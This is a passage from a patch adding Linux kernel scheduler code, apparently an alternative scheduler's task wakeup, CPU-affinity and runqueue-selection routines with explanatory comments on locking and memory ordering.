++
++static inline int select_task_rq(struct task_struct *p)
++{
++	cpumask_t allow_mask, mask;
++
++	if (unlikely(!cpumask_and(&allow_mask, p->cpus_ptr, cpu_active_mask)))
++		return select_fallback_rq(task_cpu(p), p);
++
++	if (
++#ifdef CONFIG_SCHED_SMT
++	    cpumask_and(&mask, &allow_mask, &sched_sg_idle_mask) ||
++#endif
++	    cpumask_and(&mask, &allow_mask, sched_idle_mask) ||
++	    preempt_mask_check(p, &allow_mask, &mask))
++		return best_mask_cpu(task_cpu(p), &mask);
++
++	return best_mask_cpu(task_cpu(p), &allow_mask);
++}
++
++void sched_set_stop_task(int cpu, struct task_struct *stop)
++{
++	static struct lock_class_key stop_pi_lock;
++	struct sched_param stop_param = { .sched_priority = STOP_PRIO };
++	struct sched_param start_param = { .sched_priority = 0 };
++	struct task_struct *old_stop = cpu_rq(cpu)->stop;
++
++	if (stop) {
++		/*
++		 * Make it appear like a SCHED_FIFO task, its something
++		 * userspace knows about and won't get confused about.
++		 *
++		 * Also, it will make PI more or less work without too
++		 * much confusion -- but then, stop work should not
++		 * rely on PI working anyway.
++		 */
++		sched_setscheduler_nocheck(stop, SCHED_FIFO, &stop_param);
++
++		/*
++		 * The PI code calls rt_mutex_setprio() with ->pi_lock held to
++		 * adjust the effective priority of a task. As a result,
++		 * rt_mutex_setprio() can trigger (RT) balancing operations,
++		 * which can then trigger wakeups of the stop thread to push
++		 * around the current task.
++		 *
++		 * The stop task itself will never be part of the PI-chain, it
++		 * never blocks, therefore that ->pi_lock recursion is safe.
++		 * Tell lockdep about this by placing the stop->pi_lock in its
++		 * own class.
++		 */
++		lockdep_set_class(&stop->pi_lock, &stop_pi_lock);
++	}
++
++	cpu_rq(cpu)->stop = stop;
++
++	if (old_stop) {
++		/*
++		 * Reset it back to a normal scheduling policy so that
++		 * it can die in pieces.
++		 */
++		sched_setscheduler_nocheck(old_stop, SCHED_NORMAL, &start_param);
++	}
++}
++
++static int affine_move_task(struct rq *rq, struct task_struct *p, int dest_cpu,
++			    raw_spinlock_t *lock, unsigned long irq_flags)
++{
++	/* Can the task run on the task's current CPU? If so, we're done */
++	if (!cpumask_test_cpu(task_cpu(p), &p->cpus_mask)) {
++		if (p->migration_disabled) {
++			if (likely(p->cpus_ptr != &p->cpus_mask))
++				__do_set_cpus_ptr(p, &p->cpus_mask);
++			p->migration_disabled = 0;
++			p->migration_flags |= MDF_FORCE_ENABLED;
++			/* When p is migrate_disabled, rq->lock should be held */
++			rq->nr_pinned--;
++		}
++
++		if (task_on_cpu(p) || READ_ONCE(p->__state) == TASK_WAKING) {
++			struct migration_arg arg = { p, dest_cpu };
++
++			/* Need help from migration thread: drop lock and wait. */
++			__task_access_unlock(p, lock);
++			raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++			stop_one_cpu(cpu_of(rq), migration_cpu_stop, &arg);
++			return 0;
++		}
++		if (task_on_rq_queued(p)) {
++			/*
++			 * OK, since we're going to drop the lock immediately
++			 * afterwards anyway.
++			 */
++			update_rq_clock(rq);
++			rq = move_queued_task(rq, p, dest_cpu);
++			lock = &rq->lock;
++		}
++	}
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++	return 0;
++}
++
++static int __set_cpus_allowed_ptr_locked(struct task_struct *p,
++					 const struct cpumask *new_mask,
++					 u32 flags,
++					 struct rq *rq,
++					 raw_spinlock_t *lock,
++					 unsigned long irq_flags)
++{
++	const struct cpumask *cpu_allowed_mask = task_cpu_possible_mask(p);
++	const struct cpumask *cpu_valid_mask = cpu_active_mask;
++	bool kthread = p->flags & PF_KTHREAD;
++	struct cpumask *user_mask = NULL;
++	int dest_cpu;
++	int ret = 0;
++
++	if (kthread || is_migration_disabled(p)) {
++		/*
++		 * Kernel threads are allowed on online && !active CPUs,
++		 * however, during cpu-hot-unplug, even these might get pushed
++		 * away if not KTHREAD_IS_PER_CPU.
++		 *
++		 * Specifically, migration_disabled() tasks must not fail the
++		 * cpumask_any_and_distribute() pick below, esp. so on
++		 * SCA_MIGRATE_ENABLE, otherwise we'll not call
++		 * set_cpus_allowed_common() and actually reset p->cpus_ptr.
++		 */
++		cpu_valid_mask = cpu_online_mask;
++	}
++
++	if (!kthread && !cpumask_subset(new_mask, cpu_allowed_mask)) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	/*
++	 * Must re-check here, to close a race against __kthread_bind(),
++	 * sched_setaffinity() is not guaranteed to observe the flag.
++	 */
++	if ((flags & SCA_CHECK) && (p->flags & PF_NO_SETAFFINITY)) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	if (cpumask_equal(&p->cpus_mask, new_mask))
++		goto out;
++
++	dest_cpu = cpumask_any_and(cpu_valid_mask, new_mask);
++	if (dest_cpu >= nr_cpu_ids) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	__do_set_cpus_allowed(p, new_mask);
++
++	if (flags & SCA_USER)
++		user_mask = clear_user_cpus_ptr(p);
++
++	ret = affine_move_task(rq, p, dest_cpu, lock, irq_flags);
++
++	kfree(user_mask);
++
++	return ret;
++
++out:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++
++	return ret;
++}
++
++/*
++ * Change a given task's CPU affinity. Migrate the thread to a
++ * proper CPU and schedule it away if the CPU it's executing on
++ * is removed from the allowed bitmask.
++ *
++ * NOTE: the caller must have a valid reference to the task, the
++ * task must not exit() & deallocate itself prematurely. The
++ * call is not atomic; no spinlocks may be held.
++ */
++static int __set_cpus_allowed_ptr(struct task_struct *p,
++				  const struct cpumask *new_mask, u32 flags)
++{
++	unsigned long irq_flags;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
++	rq = __task_access_lock(p, &lock);
++
++	return __set_cpus_allowed_ptr_locked(p, new_mask, flags, rq, lock, irq_flags);
++}
++
++int set_cpus_allowed_ptr(struct task_struct *p, const struct cpumask *new_mask)
++{
++	return __set_cpus_allowed_ptr(p, new_mask, 0);
++}
++EXPORT_SYMBOL_GPL(set_cpus_allowed_ptr);
++
++/*
++ * Change a given task's CPU affinity to the intersection of its current
++ * affinity mask and @subset_mask, writing the resulting mask to @new_mask
++ * and pointing @p->user_cpus_ptr to a copy of the old mask.
++ * If the resulting mask is empty, leave the affinity unchanged and return
++ * -EINVAL.
++ */
++static int restrict_cpus_allowed_ptr(struct task_struct *p,
++				     struct cpumask *new_mask,
++				     const struct cpumask *subset_mask)
++{
++	struct cpumask *user_mask = NULL;
++	unsigned long irq_flags;
++	raw_spinlock_t *lock;
++	struct rq *rq;
++	int err;
++
++	if (!p->user_cpus_ptr) {
++		user_mask = kmalloc(cpumask_size(), GFP_KERNEL);
++		if (!user_mask)
++			return -ENOMEM;
++	}
++
++	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
++	rq = __task_access_lock(p, &lock);
++
++	if (!cpumask_and(new_mask, &p->cpus_mask, subset_mask)) {
++		err = -EINVAL;
++		goto err_unlock;
++	}
++
++	/*
++	 * We're about to butcher the task affinity, so keep track of what
++	 * the user asked for in case we're able to restore it later on.
++	 */
++	if (user_mask) {
++		cpumask_copy(user_mask, p->cpus_ptr);
++		p->user_cpus_ptr = user_mask;
++	}
++
++	/*return __set_cpus_allowed_ptr_locked(p, new_mask, 0, rq, &rf);*/
++	return __set_cpus_allowed_ptr_locked(p, new_mask, 0, rq, lock, irq_flags);
++
++err_unlock:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++	kfree(user_mask);
++	return err;
++}
++
++/*
++ * Restrict the CPU affinity of task @p so that it is a subset of
++ * task_cpu_possible_mask() and point @p->user_cpu_ptr to a copy of the
++ * old affinity mask. If the resulting mask is empty, we warn and walk
++ * up the cpuset hierarchy until we find a suitable mask.
++ */
++void force_compatible_cpus_allowed_ptr(struct task_struct *p)
++{
++	cpumask_var_t new_mask;
++	const struct cpumask *override_mask = task_cpu_possible_mask(p);
++
++	alloc_cpumask_var(&new_mask, GFP_KERNEL);
++
++	/*
++	 * __migrate_task() can fail silently in the face of concurrent
++	 * offlining of the chosen destination CPU, so take the hotplug
++	 * lock to ensure that the migration succeeds.
++	 */
++	cpus_read_lock();
++	if (!cpumask_available(new_mask))
++		goto out_set_mask;
++
++	if (!restrict_cpus_allowed_ptr(p, new_mask, override_mask))
++		goto out_free_mask;
++
++	/*
++	 * We failed to find a valid subset of the affinity mask for the
++	 * task, so override it based on its cpuset hierarchy.
++	 */
++	cpuset_cpus_allowed(p, new_mask);
++	override_mask = new_mask;
++
++out_set_mask:
++	if (printk_ratelimit()) {
++		printk_deferred("Overriding affinity for process %d (%s) to CPUs %*pbl\n",
++				task_pid_nr(p), p->comm,
++				cpumask_pr_args(override_mask));
++	}
++
++	WARN_ON(set_cpus_allowed_ptr(p, override_mask));
++out_free_mask:
++	cpus_read_unlock();
++	free_cpumask_var(new_mask);
++}
++
++static int
++__sched_setaffinity(struct task_struct *p, const struct cpumask *mask);
++
++/*
++ * Restore the affinity of a task @p which was previously restricted by a
++ * call to force_compatible_cpus_allowed_ptr(). This will clear (and free)
++ * @p->user_cpus_ptr.
++ *
++ * It is the caller's responsibility to serialise this with any calls to
++ * force_compatible_cpus_allowed_ptr(@p).
++ */
++void relax_compatible_cpus_allowed_ptr(struct task_struct *p)
++{
++	struct cpumask *user_mask = p->user_cpus_ptr;
++	unsigned long flags;
++
++	/*
++	 * Try to restore the old affinity mask. If this fails, then
++	 * we free the mask explicitly to avoid it being inherited across
++	 * a subsequent fork().
++	 */
++	if (!user_mask || !__sched_setaffinity(p, user_mask))
++		return;
++
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	user_mask = clear_user_cpus_ptr(p);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++
++	kfree(user_mask);
++}
++
++#else /* CONFIG_SMP */
++
++static inline int select_task_rq(struct task_struct *p)
++{
++	return 0;
++}
++
++static inline int
++__set_cpus_allowed_ptr(struct task_struct *p,
++		       const struct cpumask *new_mask, u32 flags)
++{
++	return set_cpus_allowed_ptr(p, new_mask);
++}
++
++static inline bool rq_has_pinned_tasks(struct rq *rq)
++{
++	return false;
++}
++
++#endif /* !CONFIG_SMP */
++
++static void
++ttwu_stat(struct task_struct *p, int cpu, int wake_flags)
++{
++	struct rq *rq;
++
++	if (!schedstat_enabled())
++		return;
++
++	rq = this_rq();
++
++#ifdef CONFIG_SMP
++	if (cpu == rq->cpu) {
++		__schedstat_inc(rq->ttwu_local);
++		__schedstat_inc(p->stats.nr_wakeups_local);
++	} else {
++		/** Alt schedule FW ToDo:
++		 * How to do ttwu_wake_remote
++		 */
++	}
++#endif /* CONFIG_SMP */
++
++	__schedstat_inc(rq->ttwu_count);
++	__schedstat_inc(p->stats.nr_wakeups);
++}
++
++/*
++ * Mark the task runnable and perform wakeup-preemption.
++ */
++static inline void
++ttwu_do_wakeup(struct rq *rq, struct task_struct *p, int wake_flags)
++{
++	check_preempt_curr(rq);
++	WRITE_ONCE(p->__state, TASK_RUNNING);
++	trace_sched_wakeup(p);
++}
++
++static inline void
++ttwu_do_activate(struct rq *rq, struct task_struct *p, int wake_flags)
++{
++	if (p->sched_contributes_to_load)
++		rq->nr_uninterruptible--;
++
++	if (
++#ifdef CONFIG_SMP
++	    !(wake_flags & WF_MIGRATED) &&
++#endif
++	    p->in_iowait) {
++		delayacct_blkio_end(p);
++		atomic_dec(&task_rq(p)->nr_iowait);
++	}
++
++	activate_task(p, rq);
++	ttwu_do_wakeup(rq, p, 0);
++}
++
++/*
++ * Consider @p being inside a wait loop:
++ *
++ *   for (;;) {
++ *      set_current_state(TASK_UNINTERRUPTIBLE);
++ *
++ *      if (CONDITION)
++ *         break;
++ *
++ *      schedule();
++ *   }
++ *   __set_current_state(TASK_RUNNING);
++ *
++ * between set_current_state() and schedule(). In this case @p is still
++ * runnable, so all that needs doing is change p->state back to TASK_RUNNING in
++ * an atomic manner.
++ *
++ * By taking task_rq(p)->lock we serialize against schedule(), if @p->on_rq
++ * then schedule() must still happen and p->state can be changed to
++ * TASK_RUNNING. Otherwise we lost the race, schedule() has happened, and we
++ * need to do a full wakeup with enqueue.
++ *
++ * Returns: %true when the wakeup is done,
++ *          %false otherwise.
++ */
++static int ttwu_runnable(struct task_struct *p, int wake_flags)
++{
++	struct rq *rq;
++	raw_spinlock_t *lock;
++	int ret = 0;
++
++	rq = __task_access_lock(p, &lock);
++	if (task_on_rq_queued(p)) {
++		/* check_preempt_curr() may use rq clock */
++		update_rq_clock(rq);
++		ttwu_do_wakeup(rq, p, wake_flags);
++		ret = 1;
++	}
++	__task_access_unlock(p, lock);
++
++	return ret;
++}
++
++#ifdef CONFIG_SMP
++void sched_ttwu_pending(void *arg)
++{
++	struct llist_node *llist = arg;
++	struct rq *rq = this_rq();
++	struct task_struct *p, *t;
++	struct rq_flags rf;
++
++	if (!llist)
++		return;
++
++	/*
++	 * rq::ttwu_pending racy indication of out-standing wakeups.
++	 * Races such that false-negatives are possible, since they
++	 * are shorter lived that false-positives would be.
++	 */
++	WRITE_ONCE(rq->ttwu_pending, 0);
++
++	rq_lock_irqsave(rq, &rf);
++	update_rq_clock(rq);
++
++	llist_for_each_entry_safe(p, t, llist, wake_entry.llist) {
++		if (WARN_ON_ONCE(p->on_cpu))
++			smp_cond_load_acquire(&p->on_cpu, !VAL);
++
++		if (WARN_ON_ONCE(task_cpu(p) != cpu_of(rq)))
++			set_task_cpu(p, cpu_of(rq));
++
++		ttwu_do_activate(rq, p, p->sched_remote_wakeup ? WF_MIGRATED : 0);
++	}
++
++	rq_unlock_irqrestore(rq, &rf);
++}
++
++void send_call_function_single_ipi(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (!set_nr_if_polling(rq->idle))
++		arch_send_call_function_single_ipi(cpu);
++	else
++		trace_sched_wake_idle_without_ipi(cpu);
++}
++
++/*
++ * Queue a task on the target CPUs wake_list and wake the CPU via IPI if
++ * necessary. The wakee CPU on receipt of the IPI will queue the task
++ * via sched_ttwu_wakeup() for activation so the wakee incurs the cost
++ * of the wakeup instead of the waker.
++ */
++static void __ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	p->sched_remote_wakeup = !!(wake_flags & WF_MIGRATED);
++
++	WRITE_ONCE(rq->ttwu_pending, 1);
++	__smp_call_single_queue(cpu, &p->wake_entry.llist);
++}
++
++static inline bool ttwu_queue_cond(struct task_struct *p, int cpu)
++{
++	/*
++	 * Do not complicate things with the async wake_list while the CPU is
++	 * in hotplug state.
++	 */
++	if (!cpu_active(cpu))
++		return false;
++
++	/* Ensure the task will still be allowed to run on the CPU. */
++	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
++		return false;
++
++	/*
++	 * If the CPU does not share cache, then queue the task on the
++	 * remote rqs wakelist to avoid accessing remote data.
++	 */
++	if (!cpus_share_cache(smp_processor_id(), cpu))
++		return true;
++
++	if (cpu == smp_processor_id())
++		return false;
++
++	/*
++	 * If the wakee cpu is idle, or the task is descheduling and the
++	 * only running task on the CPU, then use the wakelist to offload
++	 * the task activation to the idle (or soon-to-be-idle) CPU as
++	 * the current CPU is likely busy. nr_running is checked to
++	 * avoid unnecessary task stacking.
++	 *
++	 * Note that we can only get here with (wakee) p->on_rq=0,
++	 * p->on_cpu can be whatever, we've done the dequeue, so
++	 * the wakee has been accounted out of ->nr_running.
++	 */
++	if (!cpu_rq(cpu)->nr_running)
++		return true;
++
++	return false;
++}
++
++static bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
++{
++	if (__is_defined(ALT_SCHED_TTWU_QUEUE) && ttwu_queue_cond(p, cpu)) {
++		sched_clock_cpu(cpu); /* Sync clocks across CPUs */
++		__ttwu_queue_wakelist(p, cpu, wake_flags);
++		return true;
++	}
++
++	return false;
++}
++
++void wake_up_if_idle(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	rcu_read_lock();
++
++	if (!is_idle_task(rcu_dereference(rq->curr)))
++		goto out;
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	if (is_idle_task(rq->curr))
++		resched_curr(rq);
++	/* Else CPU is not idle, do nothing here */
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++out:
++	rcu_read_unlock();
++}
++
++bool cpus_share_cache(int this_cpu, int that_cpu)
++{
++	if (this_cpu == that_cpu)
++		return true;
++
++	return per_cpu(sd_llc_id, this_cpu) == per_cpu(sd_llc_id, that_cpu);
++}
++#else /* !CONFIG_SMP */
++
++static inline bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
++{
++	return false;
++}
++
++#endif /* CONFIG_SMP */
++
++static inline void ttwu_queue(struct task_struct *p, int cpu, int wake_flags)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (ttwu_queue_wakelist(p, cpu, wake_flags))
++		return;
++
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++	ttwu_do_activate(rq, p, wake_flags);
++	raw_spin_unlock(&rq->lock);
++}
++
++/*
++ * Invoked from try_to_wake_up() to check whether the task can be woken up.
++ *
++ * The caller holds p::pi_lock if p != current or has preemption
++ * disabled when p == current.
++ *
++ * The rules of PREEMPT_RT saved_state:
++ *
++ *   The related locking code always holds p::pi_lock when updating
++ *   p::saved_state, which means the code is fully serialized in both cases.
++ *
++ *   The lock wait and lock wakeups happen via TASK_RTLOCK_WAIT. No other
++ *   bits set. This allows to distinguish all wakeup scenarios.
++ */
++static __always_inline
++bool ttwu_state_match(struct task_struct *p, unsigned int state, int *success)
++{
++	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)) {
++		WARN_ON_ONCE((state & TASK_RTLOCK_WAIT) &&
++			     state != TASK_RTLOCK_WAIT);
++	}
++
++	if (READ_ONCE(p->__state) & state) {
++		*success = 1;
++		return true;
++	}
++
++#ifdef CONFIG_PREEMPT_RT
++	/*
++	 * Saved state preserves the task state across blocking on
++	 * an RT lock.  If the state matches, set p::saved_state to
++	 * TASK_RUNNING, but do not wake the task because it waits
++	 * for a lock wakeup. Also indicate success because from
++	 * the regular waker's point of view this has succeeded.
++	 *
++	 * After acquiring the lock the task will restore p::__state
++	 * from p::saved_state which ensures that the regular
++	 * wakeup is not lost. The restore will also set
++	 * p::saved_state to TASK_RUNNING so any further tests will
++	 * not result in false positives vs. @success
++	 */
++	if (p->saved_state & state) {
++		p->saved_state = TASK_RUNNING;
++		*success = 1;
++	}
++#endif
++	return false;
++}
++
++/*
++ * Notes on Program-Order guarantees on SMP systems.
++ *
++ *  MIGRATION
++ *
++ * The basic program-order guarantee on SMP systems is that when a task [t]
++ * migrates, all its activity on its old CPU [c0] happens-before any subsequent
++ * execution on its new CPU [c1].
++ *
++ * For migration (of runnable tasks) this is provided by the following means:
++ *
++ *  A) UNLOCK of the rq(c0)->lock scheduling out task t
++ *  B) migration for t is required to synchronize *both* rq(c0)->lock and
++ *     rq(c1)->lock (if not at the same time, then in that order).
++ *  C) LOCK of the rq(c1)->lock scheduling in task
++ *
++ * Transitivity guarantees that B happens after A and C after B.
++ * Note: we only require RCpc transitivity.
++ * Note: the CPU doing B need not be c0 or c1
++ *
++ * Example:
++ *
++ *   CPU0            CPU1            CPU2
++ *
++ *   LOCK rq(0)->lock
++ *   sched-out X
++ *   sched-in Y
++ *   UNLOCK rq(0)->lock
++ *
++ *                                   LOCK rq(0)->lock // orders against CPU0
++ *                                   dequeue X
++ *                                   UNLOCK rq(0)->lock
++ *
++ *                                   LOCK rq(1)->lock
++ *                                   enqueue X
++ *                                   UNLOCK rq(1)->lock
++ *
++ *                   LOCK rq(1)->lock // orders against CPU2
++ *                   sched-out Z
++ *                   sched-in X
++ *                   UNLOCK rq(1)->lock
++ *
++ *
++ *  BLOCKING -- aka. SLEEP + WAKEUP
++ *
++ * For blocking we (obviously) need to provide the same guarantee as for
++ * migration. However the means are completely different as there is no lock
++ * chain to provide order. Instead we do:
++ *
++ *   1) smp_store_release(X->on_cpu, 0)   -- finish_task()
++ *   2) smp_cond_load_acquire(!X->on_cpu) -- try_to_wake_up()
++ *
++ * Example:
++ *
++ *   CPU0 (schedule)  CPU1 (try_to_wake_up) CPU2 (schedule)
++ *
++ *   LOCK rq(0)->lock LOCK X->pi_lock
++ *   dequeue X
++ *   sched-out X
++ *   smp_store_release(X->on_cpu, 0);
++ *
++ *                    smp_cond_load_acquire(&X->on_cpu, !VAL);
++ *                    X->state = WAKING
++ *                    set_task_cpu(X,2)
++ *
++ *                    LOCK rq(2)->lock
++ *                    enqueue X
++ *                    X->state = RUNNING
++ *                    UNLOCK rq(2)->lock
++ *
++ *                                          LOCK rq(2)->lock // orders against CPU1
++ *                                          sched-out Z
++ *                                          sched-in X
++ *                                          UNLOCK rq(2)->lock
++ *
++ *                    UNLOCK X->pi_lock
++ *   UNLOCK rq(0)->lock
++ *
++ *
++ * However; for wakeups there is a second guarantee we must provide, namely we
++ * must observe the state that lead to our wakeup. That is, not only must our
++ * task observe its own prior state, it must also observe the stores prior to
++ * its wakeup.
++ *
++ * This means that any means of doing remote wakeups must order the CPU doing
++ * the wakeup against the CPU the task is going to end up running on. This,
++ * however, is already required for the regular Program-Order guarantee above,
++ * since the waking CPU is the one issueing the ACQUIRE (smp_cond_load_acquire).
++ *
++ */
++
++/**
++ * try_to_wake_up - wake up a thread
++ * @p: the thread to be awakened
++ * @state: the mask of task states that can be woken
++ * @wake_flags: wake modifier flags (WF_*)
++ *
++ * Conceptually does:
++ *
++ *   If (@state & @p->state) @p->state = TASK_RUNNING.
++ *
++ * If the task was not queued/runnable, also place it back on a runqueue.
++ *
++ * This function is atomic against schedule() which would dequeue the task.
++ *
++ * It issues a full memory barrier before accessing @p->state, see the comment
++ * with set_current_state().
++ *
++ * Uses p->pi_lock to serialize against concurrent wake-ups.
++ *
++ * Relies on p->pi_lock stabilizing:
++ *  - p->sched_class
++ *  - p->cpus_ptr
++ *  - p->sched_task_group
++ * in order to do migration, see its use of select_task_rq()/set_task_cpu().
++ *
++ * Tries really hard to only take one task_rq(p)->lock for performance.
++ * Takes rq->lock in:
++ *  - ttwu_runnable()    -- old rq, unavoidable, see comment there;
++ *  - ttwu_queue()       -- new rq, for enqueue of the task;
++ *  - psi_ttwu_dequeue() -- much sadness :-( accounting will kill us.
++ *
++ * As a consequence we race really badly with just about everything. See the
++ * many memory barriers and their comments for details.
++ *
++ * Return: %true if @p->state changes (an actual wakeup was done),
++ *	   %false otherwise.
++ */
++static int try_to_wake_up(struct task_struct *p, unsigned int state,
++			  int wake_flags)
++{
++	unsigned long flags;
++	int cpu, success = 0;
++
++	preempt_disable();
++	if (p == current) {
++		/*
++		 * We're waking current, this means 'p->on_rq' and 'task_cpu(p)
++		 * == smp_processor_id()'. Together this means we can special
++		 * case the whole 'p->on_rq && ttwu_runnable()' case below
++		 * without taking any locks.
++		 *
++		 * In particular:
++		 *  - we rely on Program-Order guarantees for all the ordering,
++		 *  - we're serialized against set_special_state() by virtue of
++		 *    it disabling IRQs (this allows not taking ->pi_lock).
++		 */
++		if (!ttwu_state_match(p, state, &success))
++			goto out;
++
++		trace_sched_waking(p);
++		WRITE_ONCE(p->__state, TASK_RUNNING);
++		trace_sched_wakeup(p);
++		goto out;
++	}
++
++	/*
++	 * If we are going to wake up a thread waiting for CONDITION we
++	 * need to ensure that CONDITION=1 done by the caller can not be
++	 * reordered with p->state check below. This pairs with smp_store_mb()
++	 * in set_current_state() that the waiting thread does.
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	smp_mb__after_spinlock();
++	if (!ttwu_state_match(p, state, &success))
++		goto unlock;
++
++	trace_sched_waking(p);
++
++	/*
++	 * Ensure we load p->on_rq _after_ p->state, otherwise it would
++	 * be possible to, falsely, observe p->on_rq == 0 and get stuck
++	 * in smp_cond_load_acquire() below.
++	 *
++	 * sched_ttwu_pending()			try_to_wake_up()
++	 *   STORE p->on_rq = 1			  LOAD p->state
++	 *   UNLOCK rq->lock
++	 *
++	 * __schedule() (switch to task 'p')
++	 *   LOCK rq->lock			  smp_rmb();
++	 *   smp_mb__after_spinlock();
++	 *   UNLOCK rq->lock
++	 *
++	 * [task p]
++	 *   STORE p->state = UNINTERRUPTIBLE	  LOAD p->on_rq
++	 *
++	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
++	 * __schedule().  See the comment for smp_mb__after_spinlock().
++	 *
++	 * A similar smb_rmb() lives in try_invoke_on_locked_down_task().
++	 */
++	smp_rmb();
++	if (READ_ONCE(p->on_rq) && ttwu_runnable(p, wake_flags))
++		goto unlock;
++
++#ifdef CONFIG_SMP
++	/*
++	 * Ensure we load p->on_cpu _after_ p->on_rq, otherwise it would be
++	 * possible to, falsely, observe p->on_cpu == 0.
++	 *
++	 * One must be running (->on_cpu == 1) in order to remove oneself
++	 * from the runqueue.
++	 *
++	 * __schedule() (switch to task 'p')	try_to_wake_up()
++	 *   STORE p->on_cpu = 1		  LOAD p->on_rq
++	 *   UNLOCK rq->lock
++	 *
++	 * __schedule() (put 'p' to sleep)
++	 *   LOCK rq->lock			  smp_rmb();
++	 *   smp_mb__after_spinlock();
++	 *   STORE p->on_rq = 0			  LOAD p->on_cpu
++	 *
++	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
++	 * __schedule().  See the comment for smp_mb__after_spinlock().
++	 *
++	 * Form a control-dep-acquire with p->on_rq == 0 above, to ensure
++	 * schedule()'s deactivate_task() has 'happened' and p will no longer
++	 * care about it's own p->state. See the comment in __schedule().
++	 */
++	smp_acquire__after_ctrl_dep();
++
++	/*
++	 * We're doing the wakeup (@success == 1), they did a dequeue (p->on_rq
++	 * == 0), which means we need to do an enqueue, change p->state to
++	 * TASK_WAKING such that we can unlock p->pi_lock before doing the
++	 * enqueue, such as ttwu_queue_wakelist().
++	 */
++	WRITE_ONCE(p->__state, TASK_WAKING);
++
++	/*
++	 * If the owning (remote) CPU is still in the middle of schedule() with
++	 * this task as prev, considering queueing p on the remote CPUs wake_list
++	 * which potentially sends an IPI instead of spinning on p->on_cpu to
++	 * let the waker make forward progress. This is safe because IRQs are
++	 * disabled and the IPI will deliver after on_cpu is cleared.
++	 *
++	 * Ensure we load task_cpu(p) after p->on_cpu:
++	 *
++	 * set_task_cpu(p, cpu);
++	 *   STORE p->cpu = @cpu
++	 * __schedule() (switch to task 'p')
++	 *   LOCK rq->lock
++	 *   smp_mb__after_spin_lock()          smp_cond_load_acquire(&p->on_cpu)
++	 *   STORE p->on_cpu = 1                LOAD p->cpu
++	 *
++	 * to ensure we observe the correct CPU on which the task is currently
++	 * scheduling.
++	 */
++	if (smp_load_acquire(&p->on_cpu) &&
++	    ttwu_queue_wakelist(p, task_cpu(p), wake_flags))
++		goto unlock;
++
++	/*
++	 * If the owning (remote) CPU is still in the middle of schedule() with
++	 * this task as prev, wait until it's done referencing the task.
++	 *
++	 * Pairs with the smp_store_release() in finish_task().
++	 *
++	 * This ensures that tasks getting woken will be fully ordered against
++	 * their previous state and preserve Program Order.
++	 */
++	smp_cond_load_acquire(&p->on_cpu, !VAL);
++
++	sched_task_ttwu(p);
++
++	cpu = select_task_rq(p);
++
++	if (cpu != task_cpu(p)) {
++		if (p->in_iowait) {
++			delayacct_blkio_end(p);
++			atomic_dec(&task_rq(p)->nr_iowait);
++		}
++
++		wake_flags |= WF_MIGRATED;
++		psi_ttwu_dequeue(p);
++		set_task_cpu(p, cpu);
++	}
++#else
++	cpu = task_cpu(p);
++#endif /* CONFIG_SMP */
++
++	ttwu_queue(p, cpu, wake_flags);
++unlock:
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++out:
++	if (success)
++		ttwu_stat(p, task_cpu(p), wake_flags);
++	preempt_enable();
++
++	return success;
++}
++
++static bool __task_needs_rq_lock(struct task_struct *p)
++{
++	unsigned int state = READ_ONCE(p->__state);
++
++	/*
++	 * Since pi->lock blocks try_to_wake_up(), we don't need rq->lock when
++	 * the task is blocked. Make sure to check @state since ttwu() can drop
++	 * locks at the end, see ttwu_queue_wakelist().
++	 */
++	if (state == TASK_RUNNING || state == TASK_WAKING)
++		return true;
++
++	/*
++	 * Ensure we load p->on_rq after p->__state, otherwise it would be
++	 * possible to, falsely, observe p->on_rq == 0.
++	 *
++	 * See try_to_wake_up() for a longer comment.
++	 */
++	smp_rmb();
++	if (p->on_rq)
++		return true;
++
++#ifdef CONFIG_SMP
++	/*
++	 * Ensure the task has finished __schedule() and will not be referenced
++	 * anymore. Again, see try_to_wake_up() for a longer comment.
++	 */
++	smp_rmb();
++	smp_cond_load_acquire(&p->on_cpu, !VAL);
++#endif
++
++	return false;
++}
++
++/**
++ * task_call_func - Invoke a function on task in fixed state
++ * @p: Process for which the function is to be invoked, can be @current.
++ * @func: Function to invoke.
++ * @arg: Argument to function.
++ *
++ * Fix the task in it's current state by avoiding wakeups and or rq operations
++ * and call @func(@arg) on it.  This function can use ->on_rq and task_curr()
++ * to work out what the state is, if required.  Given that @func can be invoked
++ * with a runqueue lock held, it had better be quite lightweight.
++ *
++ * Returns:
++ *   Whatever @func returns
++ */
++int task_call_func(struct task_struct *p, task_call_f func, void *arg)
++{
++	struct rq *rq = NULL;
++	struct rq_flags rf;
++	int ret;
++
++	raw_spin_lock_irqsave(&p->pi_lock, rf.flags);
++
++	if (__task_needs_rq_lock(p))
++		rq = __task_rq_lock(p, &rf);
++
++	/*
++	 * At this point the task is pinned; either:
++	 *  - blocked and we're holding off wakeups      (pi->lock)
++	 *  - woken, and we're holding off enqueue       (rq->lock)
